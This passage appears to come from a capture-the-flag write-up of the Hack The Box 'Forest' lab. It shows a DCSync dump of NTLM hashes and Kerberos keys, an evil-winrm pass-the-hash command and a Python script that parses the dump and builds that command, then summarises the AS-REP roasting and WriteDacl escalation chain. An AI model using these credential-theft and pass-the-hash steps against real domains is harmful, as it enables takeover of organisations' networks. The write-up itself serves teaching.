krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
hack:9601:aad3b435b51404eeaad3b435b51404ee:3593d341679cb1cd42d5ee96d317987d:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:541d62e36754f1ad9932c73c83a2ea22:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
hack:aes256-cts-hmac-sha1-96:3e877d2ee838c042e5124b1304e158a77cf7ac14422977e5d769b5fb336a59c5
hack:aes128-cts-hmac-sha1-96:d81571d16a8bcc04086496dcb8c1ca76
hack:des-cbc-md5:706b0bec3b2986da
FOREST$:aes256-cts-hmac-sha1-96:03c48356fe7273823823843a0404b6a40f2970a44daf762a7632d9b101dbfaba
FOREST$:aes128-cts-hmac-sha1-96:0612d5cf3ef699f12e8bf4d2db18c9f2
FOREST$:des-cbc-md5:a4ceadfed0d526a7
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...
Getting the system flag
From the DCSync output: htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Pass the hash with evil-winrm: the NT half alone is given to -H (the LM:NT string handed to -p would be sent as a password and fail)
evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
type C:\Users\administrator\Desktop\root.txt
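Reading the dump by eye works for one box; for a real domain it is better to parse it. The script below is an added example (not from the page or impacket): it parses secretsdump's domain\user:rid:lm:nt::: lines, skips the status and Kerberos-key lines, pulls the NT hash of the account to pass, and flags what a DCSync dump commonly reveals: accounts whose NT hash equals the empty-password value, machine accounts, and the same NT hash on several accounts (NTLM is unsalted, so that means the same password). The sample lines are copied from the dump above except one constructed line, labelled in the code, that gives the reuse check something to report; the host address and the evil-winrm -H syntax are the page's own.

```python
"""Triage a secretsdump.py (DCSync) dump: hash to pass, empty passwords, machine accounts, NT-hash reuse."""
import re
from typing import Dict, List

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4 of the empty UTF-16LE string
# One NTLM line per account, in impacket's own header format: [domain\]user:rid:lmhash:nthash:::
NTLM_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^\\:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Lines copied from the dump on this page; only the final hack2 line is constructed
# (a second account carrying hack's NT hash) so that the reuse check has a hit.
SAMPLE_DUMP = r"""
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
hack:9601:aad3b435b51404eeaad3b435b51404ee:3593d341679cb1cd42d5ee96d317987d:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:541d62e36754f1ad9932c73c83a2ea22:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
hack2:9602:aad3b435b51404eeaad3b435b51404ee:3593d341679cb1cd42d5ee96d317987d:::
"""


def parse_secretsdump(text: str) -> List[Dict[str, str]]:
    """One dict per NTLM line; [*]/[-] status lines and the Kerberos key section do not match and are dropped."""
    entries = []
    for line in text.splitlines():
        m = NTLM_LINE.match(line.strip())
        if m:
            entries.append(m.groupdict())
    return entries


def nt_hash_of(entries: List[Dict[str, str]], user: str) -> str:
    """NT hash of a user; names compare case-insensitively as Windows treats them. KeyError if absent."""
    for e in entries:
        if e["user"].lower() == user.lower():
            return e["nt"]
    raise KeyError(user)


def triage(entries: List[Dict[str, str]]) -> Dict[str, list]:
    """What a DCSync dump tells you at a glance."""
    by_nt: Dict[str, List[str]] = {}
    for e in entries:
        by_nt.setdefault(e["nt"], []).append(e["user"])
    return {
        # Empty NT hash: usually a disabled built-in (Guest, DefaultAccount) or an Exchange SM_ mailbox
        # account; confirm the account is disabled before reading it as "logs in with no password".
        "empty_password": by_nt.get(EMPTY_NT, []),
        # Machine accounts end in $; their NT hash is the key for silver tickets to that host's services.
        "machine_accounts": [e["user"] for e in entries if e["user"].endswith("$")],
        # Identical NT hashes mean identical passwords: NTLM has no salt.
        "nt_reuse": [users for nt, users in by_nt.items() if nt != EMPTY_NT and len(users) > 1],
    }


def pth_command(entries: List[Dict[str, str]], user: str = "Administrator", host: str = "10.10.10.161") -> str:
    """evil-winrm pass-the-hash: the NT hash alone goes to -H; -p expects a plaintext password."""
    return f"evil-winrm -i {host} -u {user} -H {nt_hash_of(entries, user)}"


if __name__ == "__main__":
    dump = parse_secretsdump(SAMPLE_DUMP)
    print(pth_command(dump))
    print(triage(dump))
```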
Summary
nmap showed the target is a domain controller. windapsearch showed that LDAP allows anonymous binds and user enumeration, which revealed the htb.local service account svc-alfresco; it has Kerberos pre-authentication disabled and is therefore vulnerable to AS-REP roasting.
GetNPUsers.py from impacket retrieved its AS-REP hash, hashcat or john cracked it to the plaintext password, and evil-winrm gave a WinRM shell on the domain controller. SharpHound.ps1 collected the domain data and BloodHound showed the privilege path:
svc-alfresco is nested into ACCOUNT OPERATORS@HTB.LOCAL, which has GenericAll over EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL, which holds WriteDacl on the path to DOMAIN ADMINS@HTB.LOCAL. The hack account was added to EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL,
WriteDacl was abused to grant it DCSync rights, and secretsdump.py from impacket performed the DCSync, yielding the Administrator hash and domain admin access.
Tools used:
nmap
windapsearch
Impacket
hashcat
john
evil-winrm
bloodhound